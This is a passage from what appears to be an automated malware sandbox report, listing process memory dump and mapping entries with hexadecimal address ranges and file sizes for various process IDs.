                                                                                          • memory/4188-331-0x0000000000CB0000-0x0000000000CB1000-memory.dmp
                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/4188-342-0x0000000005650000-0x0000000005651000-memory.dmp
                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/4212-374-0x0000000000000000-mapping.dmp
                                                                                          • memory/4216-311-0x0000000000000000-mapping.dmp
                                                                                          • memory/4252-340-0x0000000005380000-0x0000000005381000-memory.dmp
                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/4252-328-0x00000000009B0000-0x00000000009B1000-memory.dmp
                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/4252-319-0x0000000000000000-mapping.dmp
                                                                                          • memory/4360-222-0x0000000000000000-mapping.dmp
                                                                                          • memory/4360-226-0x0000000000400000-0x00000000004E4000-memory.dmp
                                                                                            Filesize

                                                                                            912KB

                                                                                          • memory/4368-290-0x0000000000000000-mapping.dmp
                                                                                          • memory/4404-394-0x0000000000400000-0x00000000008EC000-memory.dmp
                                                                                            Filesize

                                                                                            4.9MB

                                                                                          • memory/4404-388-0x0000000000B00000-0x0000000000B9D000-memory.dmp
                                                                                            Filesize

                                                                                            628KB

                                                                                          • memory/4404-326-0x0000000000000000-mapping.dmp
                                                                                          • memory/4448-297-0x0000000000000000-mapping.dmp
                                                                                          • memory/4452-232-0x0000000000000000-mapping.dmp
                                                                                          • memory/4452-353-0x0000000000400000-0x00000000009BE000-memory.dmp
                                                                                            Filesize

                                                                                            5.7MB

                                                                                          • memory/4452-351-0x00000000009C0000-0x0000000000A6E000-memory.dmp
                                                                                            Filesize

                                                                                            696KB

                                                                                          • memory/4468-288-0x0000000000000000-mapping.dmp
                                                                                          • memory/4508-343-0x0000000000860000-0x0000000000861000-memory.dmp
                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/4508-358-0x0000000005BF0000-0x0000000005BF1000-memory.dmp
                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/4508-339-0x0000000077D80000-0x0000000077F0E000-memory.dmp
                                                                                            Filesize

                                                                                            1.6MB

                                                                                          • memory/4508-325-0x0000000000000000-mapping.dmp
                                                                                          • memory/4544-289-0x0000000000000000-mapping.dmp
                                                                                          • memory/4592-363-0x00000000057F0000-0x0000000005DF6000-memory.dmp
                                                                                            Filesize

                                                                                            6.0MB

                                                                                          • memory/4592-347-0x0000000000417DEA-mapping.dmp
                                                                                          • memory/4592-345-0x0000000000400000-0x000000000041E000-memory.dmp
                                                                                            Filesize

                                                                                            120KB

                                                                                          • memory/4600-321-0x0000000000000000-mapping.dmp
                                                                                          • memory/4604-244-0x0000000000000000-mapping.dmp
                                                                                          • memory/4620-246-0x0000000000000000-mapping.dmp
                                                                                          • memory/4648-403-0x0000000000000000-mapping.dmp
                                                                                          • memory/4800-260-0x0000000000000000-mapping.dmp
                                                                                          • memory/4800-267-0x0000021FB2D50000-0x0000021FB2D51000-memory.dmp
                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/4816-399-0x0000000000000000-mapping.dmp
                                                                                          • memory/4908-392-0x00000000030F0000-0x000000000314D000-memory.dmp
                                                                                            Filesize

                                                                                            372KB

                                                                                          • memory/4908-390-0x00000000048A6000-0x00000000049A7000-memory.dmp
                                                                                            Filesize

                                                                                            1.0MB

                                                                                          • memory/4908-384-0x0000000000000000-mapping.dmp
                                                                                          • memory/4972-298-0x0000000000417E1A-mapping.dmp
                                                                                          • memory/4972-296-0x0000000000400000-0x000000000041E000-memory.dmp
                                                                                            Filesize

                                                                                            120KB

                                                                                          • memory/4972-322-0x0000000004E50000-0x0000000005456000-memory.dmp
                                                                                            Filesize

                                                                                            6.0MB

                                                                                          • memory/5040-276-0x0000000000000000-mapping.dmp
                                                                                          • memory/5080-366-0x0000000000417DFA-mapping.dmp
                                                                                          • memory/5080-377-0x00000000054B0000-0x0000000005AB6000-memory.dmp
                                                                                            Filesize

                                                                                            6.0MB

                                                                                          • memory/5088-330-0x0000000005AA0000-0x0000000005AA1000-memory.dmp
                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/5088-299-0x0000000004E70000-0x0000000004E71000-memory.dmp
                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/5088-315-0x0000000004F00000-0x0000000004F01000-memory.dmp
                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/5088-285-0x0000000005380000-0x0000000005381000-memory.dmp
                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/5088-313-0x0000000004D70000-0x0000000005376000-memory.dmp
                                                                                            Filesize

                                                                                            6.0MB

                                                                                          • memory/5088-278-0x0000000000000000-mapping.dmp
                                                                                          • memory/5088-282-0x0000000000600000-0x0000000000601000-memory.dmp
                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/5088-293-0x0000000004E10000-0x0000000004E11000-memory.dmp
                                                                                            Filesize

                                                                                            4KB